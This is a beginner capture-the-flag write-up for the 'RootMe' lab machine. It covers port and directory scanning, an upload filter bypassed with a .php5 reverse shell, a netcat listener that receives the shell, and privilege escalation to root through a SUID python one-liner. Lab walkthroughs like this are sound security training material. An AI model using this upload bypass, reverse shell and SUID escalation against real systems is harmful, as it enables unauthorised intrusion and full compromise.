💻RootMe

A ctf for beginners, can you root me?

1. Reconnaissance

1.1 Nmap

Using nmap to scan for open ports and services

nmap -Pn -sC -sV -oA nmap.initial 10.10.40.110                        

Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-28 19:14 IST
Stats: 0:00:01 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.10.40.110
Host is up (2.8s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_  256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: HackIT - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 206.54 seconds

we find 2 open ports, 22 and 80 running ssh and web server respectively

2. Scanning

2.1 Gobuster

Using gobuster to brute-force directories in the web server.

sudo gobuster dir -u http://10.10.40.110 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-directories.txt

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.40.110
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/03/28 19:15:27 Starting gobuster in directory enumeration mode
===============================================================
/js                   (Status: 301) [Size: 309] [--> http://10.10.40.110/js/]
/css                  (Status: 301) [Size: 310] [--> http://10.10.40.110/css/]
/uploads              (Status: 301) [Size: 314] [--> http://10.10.40.110/uploads/]
/panel                (Status: 301) [Size: 312] [--> http://10.10.40.110/panel/]  
/server-status        (Status: 403) [Size: 277]

We find two interesting directories /panel and /uploads

/panel

We find a page to upload files

/uploads

We can see and access the uploaded files here

3. Gaining Access

3.1 Reverse shell

Using the php reverse shell from pentest monkey (https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php)

We find that uploading any .php files gives us an error

Changing the extension of the script from .php to .php5 to bypass

Starting an nc listener on our attacking machine and executing the reverse shell by going to /uploads selecting our uploaded .php5 file

nc -lvnp 9001 

1m 34s
listening on [any] 9001 ...
connect to [10.11.66.165] from (UNKNOWN) [10.10.150.128] 45406

Stabilizing the shell and reading user.txt file

$ python -c 'import pty;pty.spawn("/bin/bash")'

bash-4.4$ find / -type f -name user.txt 2>/dev/null
/var/www/user.txt

bash-4.4$ cat /var/www/user.txt

4. Privilege Escalation

4.1 SUID

Searching for exploitable processes with set SUID

bash-4.4$ find / -type f -perm -04000 -ls 2>/dev/null

=====================================================================
2019 /usr/bin/newuidmap
   787288     40 -rwsr-xr-x   1 root     root          37136 Mar 22  2019 /usr/bin/newgidmap
   787086     44 -rwsr-xr-x   1 root     root          44528 Mar 22  2019 /usr/bin/chsh
   266770   3580 -rwsr-sr-x   1 root     root        3665768 Aug  4  2020 /usr/bin/python
   787033     52 -rwsr-sr-x   1 daemon   daemon        51464 Feb 20  2018 /usr/bin/at
   787084     76 -rwsr-xr-x   1 root     root          76496 Mar 22  2019 /usr/bin/chfn
   787179     76 -rwsr-xr-x   1 root     root          75824 Mar 22  2019 /usr/bin/gpasswd
   787431    148 -rwsr-xr-x   1 root     root         149080 Jan 31  2020 /usr/bin/sudo
   787289     40 -rwsr-xr-x   1 root     root          40344 Mar 22  
   
=======================================================================

We find that /usr/bin/python has SUID bit set.
Using the one liner from GTFOBins, we get root

python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

whoami
root

Reading root.txt

cd /root
cat root.txt

PreviousPickle Rick NextYear of the Rabbit

Last updated 3 years ago